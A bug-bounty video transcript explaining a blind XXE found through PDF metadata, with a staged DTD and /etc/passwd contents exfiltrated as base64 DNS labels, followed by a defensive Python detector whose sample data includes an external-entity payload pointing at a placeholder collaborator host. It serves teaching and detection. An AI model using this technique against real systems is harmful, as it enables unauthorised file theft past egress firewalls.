A $7.500 BUG BOUNTY Bug explained, step by step. (BLIND XXE OOB over DNS) - REDUX

Captions
Oh hi, my name is STÖK and I just love testing for file uploads, especially the blind ones. You see, that seems to be the thing with file uploads nowadays: they tend to be blind. Sooner or later the malicious content that you provide and send to the system will be processed. It might be tomorrow or some other day, but one day your content will be touched by something or someone. That's exactly what happened with this really sweet blind XXE that I found, using a PDF file upload as the first part of my staged payload. But before we break down how I found that bug and how I exploited it, I would like to say thank you, thank you from the bottom of my heart, for taking your time to watch this and joining my YouTube channel. And if you are into bounties, hacking, conventions and everything that comes with a bounty lifestyle, then help me to grow this channel by hitting the subscribe button and leave a comment below. That way you're helping me so I can help others to become better hackers.

So I was testing this site for file upload functionality, and it was a two-bit kind of chat thingy where you also could attach files to it, and in the conversation even share those files to your non-signed-up friends. This feature will play a significant role later on. So I tested more or less for everything, you know: all the ImageTragick versions, PS files, SVGs, PHP payloads, command injections, you name it. If it was a payload for file uploads, I tried it. So I was kind of running out of options, and then I remembered a blog post where someone somewhere had mentioned that you're able to sneak XML entities into PDF files, due to the fact that those meta tags are more or less all XML. So I reckoned I'd give that a go as well. So I fired up Burp Collaborator, got a URL and modified my PDF file with that fresh collaborator. I tried everything; this was the last one, it had to work. So I uploaded it and I pushed refresh. Nothing happened. I'm like, I'm out of options, and I took a break.

I went to the kitchen and got some water and the leftovers, put on a fresh pot of coffee, and went back again. When I got back I saw that my payload had been activated: I had a fresh DNS lookup sitting in my collaborator window, and I'm like, what's this? But there was no HTTP request, so that means that either the target is heavily firewalled and not allowing any kind of egress (outgoing) traffic but apparently forwarding DNS requests to an internal DNS server, or it could just be a false positive. To be sure I ran a quick host reverse lookup that showed me the PTR of the in-scope domain for the IP address, and I'm like yes, yes, I'm in scope: the request that I made came from inside the data center IP block that belonged to the target. Nice. But to be really, really sure I also did a whois on the IP to make sure that it was definitely inside the scope.

So I uploaded a PDF again, but this time nothing happened. Why? Simply because I used the same collaborator payload, and by design of the DNS cache, since the DNS server already knew the IP of my collaborator, it just pulled it from its own cache, so no out-of-band request for me. Which kind of sucked, because that meant I needed to get a new collaborator for every single request that I was planning to make from now on. I then spent a few hours creating collaborator URLs, testing all possible egress (outgoing) traffic, and I even tried all the internal DTD requests that I could find (there's a great write-up on that, I'll post it in the comments below, check that one out), but none of that worked. So this system was hardened and I had no way to externally get a request going out to fetch my entity file. And then it just hit me: externally? Maybe if I uploaded the DTD file as a raw text file and shared it publicly using the chat sharing thing, maybe if I was lucky enough I could use that one. So I pulled out a fresh collaborator, placed it in the entity tag of my raw file and uploaded it to the target. I publicly shared it and made sure that I was able to fetch it with curl without any distortion or a need for authentication. I didn't want to risk anything here. And just like that, the file content came back without any issues. Hmm, I was golden, this had to work.

So I modified my request with the new shared URL and I sent it off. Waited a few seconds, refreshed, and boom, there it was. I successfully pulled the second part of the payload, and now I was getting a full request of the DNS lookup for my secondary entity that was placed inside my DTD file. Hmm, but I already knew that I would be unable to get any kind of file content or information inside, let's say, /etc/passwd in a POST request, as the system, as you saw, is heavily firewalled. But the system did allow me to do DNS lookups, so time to smuggle that content over DNS. So I modified my payload in my text file, my DTD file, and I added the secondary part as a subdomain of my collaborator URL in a certain way. Yes! And there was the first line of /etc/passwd as a part of my DNS request. DNS smuggling: get the first line of /etc/passwd, base64 it and then send it over to your DNS. Then you get a smuggled line and you can decode that later on. That serves as a common proof of concept.

But what if this parser had taken time? Then I wouldn't be able to know, simply because I was using collaborator, and collaborator only works as long as you're having an active session. And that's why I'm nowadays using my own BIND server and log systems. If I leave a payload anywhere, I know it's gonna call back eventually, and I use unique subdomains for it so I know which target eventually ends up in my log. If you want to know more about that, I'm gonna have an upcoming tutorial explaining that, so do subscribe and turn that bell function thingy on so you don't miss that. I hope you like this; if you did, smash it, if you did like it. And yeah, until next time, I love you, hack the planet, have a good one.
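Both stages STÖK describes leave traces a defender can check: the first stage is a DTD declaration sitting inside a PDF's XMP metadata (XMP never legitimately needs one), and the second is file content leaving the network as base64 inside DNS labels, which the video shows working even when HTTP egress is blocked because the internal resolver still forwards lookups. The Python script below is an added example, not STÖK's code or any tool shown in the video. It flags DOCTYPE/ENTITY declarations found in the XMP packets of an uploaded file, and scans BIND-style query-log lines for labels that base64-decode to printable text. The two PDF blobs, the log lines and the `collab.example.invalid` hostname are all constructed for the example; the `23-Mar-2020` timestamps are likewise made up.

```python
from __future__ import annotations

import base64
import re

# Constructed sample: a minimal PDF-shaped blob whose XMP metadata stream carries a DOCTYPE
# with a parameter entity pointing at an external DTD (the shape of the video's first stage).
# The collaborator hostname is a placeholder, not a real domain.
SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Metadata /Subtype /XML /Length 260 >>
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE x [ <!ENTITY % ext SYSTEM "https://collab.example.invalid/stage2.dtd"> %ext; ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/"/>
<?xpacket end="w"?>
endstream
endobj
%%EOF
"""

# Constructed sample: the same layout with ordinary XMP and no DTD at all.
CLEAN_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Metadata /Subtype /XML /Length 140 >>
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"/></x:xmpmeta>
<?xpacket end="w"?>
endstream
endobj
%%EOF
"""

XMP_PACKET_RE = re.compile(rb"<\?xpacket begin.*?<\?xpacket end=[^>]*\?>", re.S)
DECL_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b[^>\[]*", re.I)
EXTERNAL_RE = re.compile(rb"\b(?:SYSTEM|PUBLIC)\b", re.I)


def xmp_dtd_findings(blob: bytes) -> list[str]:
    """Return one entry per DOCTYPE/ENTITY declaration found inside XMP packets.

    XMP metadata never needs a DTD, so any declaration is worth rejecting at upload
    time; a SYSTEM/PUBLIC identifier additionally means the parser would fetch something.
    """
    findings = []
    for packet in XMP_PACKET_RE.findall(blob):
        for m in DECL_RE.finditer(packet):
            kind = "external" if EXTERNAL_RE.search(m.group(0)) else "internal"
            findings.append(f"{m.group(1).decode().upper()} ({kind})")
    return findings


# Constructed sample of BIND-style query-log lines. The long label in the second line is the
# URL-safe base64 of a typical first line of /etc/passwd, built here so the sample explains
# itself; the collaborator domain is again a placeholder.
EXFIL_LABEL = base64.urlsafe_b64encode(b"root:x:0:0:root:/root:/bin/bash").decode().rstrip("=")
DNS_LOG = "\n".join([
    "23-Mar-2020 12:01:03.110 client 10.0.4.17#53012: query: www.example.net IN A + (10.0.4.1)",
    f"23-Mar-2020 12:01:09.442 client 10.0.4.17#53012: query: {EXFIL_LABEL}.a1b2c3.collab.example.invalid IN A + (10.0.4.1)",
    "23-Mar-2020 12:01:12.008 client 10.0.4.17#53012: query: mail.example.net IN MX + (10.0.4.1)",
])

QUERY_RE = re.compile(r"query: (\S+) IN ")
MIN_LABEL = 16  # short labels (www, mail, cdn01) are never worth decoding


def decode_label(label: str) -> str | None:
    """Base64-decode one DNS label (URL-safe or standard alphabet) if it yields printable ASCII."""
    if len(label) < MIN_LABEL:
        return None
    std = label.translate(str.maketrans("-_", "+/"))
    padded = std + "=" * (-len(std) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None
    return text if text.isprintable() else None


def dns_exfil_hits(log_text: str) -> list[tuple[str, str]]:
    """Scan query-log lines and return (queried name, decoded label) for labels that decode."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        name = m.group(1).rstrip(".")
        for label in name.split("."):
            decoded = decode_label(label)
            if decoded is not None:
                hits.append((name, decoded))
    return hits


if __name__ == "__main__":
    print("upload check:", xmp_dtd_findings(SUSPICIOUS_PDF), xmp_dtd_findings(CLEAN_PDF))
    for name, decoded in dns_exfil_hits(DNS_LOG):
        print(f"possible DNS exfil: {name} -> {decoded!r}")
```

The log check deliberately does not filter on a known attacker domain: as the video shows, the collaborator hostname changes with every attempt, so the signal has to come from the label itself. Decoding to printable text is a cheap first filter; a production detector would pair it with label-length and query-rate thresholds. The upstream fix the upload check points at is to parse metadata with DTD processing disabled, so that no declaration, internal or external, is ever acted on.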
Info
Channel: STÖK
Views: 91,549
Keywords: bugbounty, bug bounty, hack, xxe, oob, blind, stok, stök, tutorial, explained, write up, file upload, hackerone, bugs, bugcrowd, pentesting website, pentesting, pentest, how to find xxe, how to look for xxe, xxe vulnerability, how to hack, how to get started in bug bounty, burp suite tutorial, burp suite for beginners, burp collaborator
Id: aSiIHKeN3ys
Length: 7min 35sec (455 seconds)
Published: Mon Mar 23 2020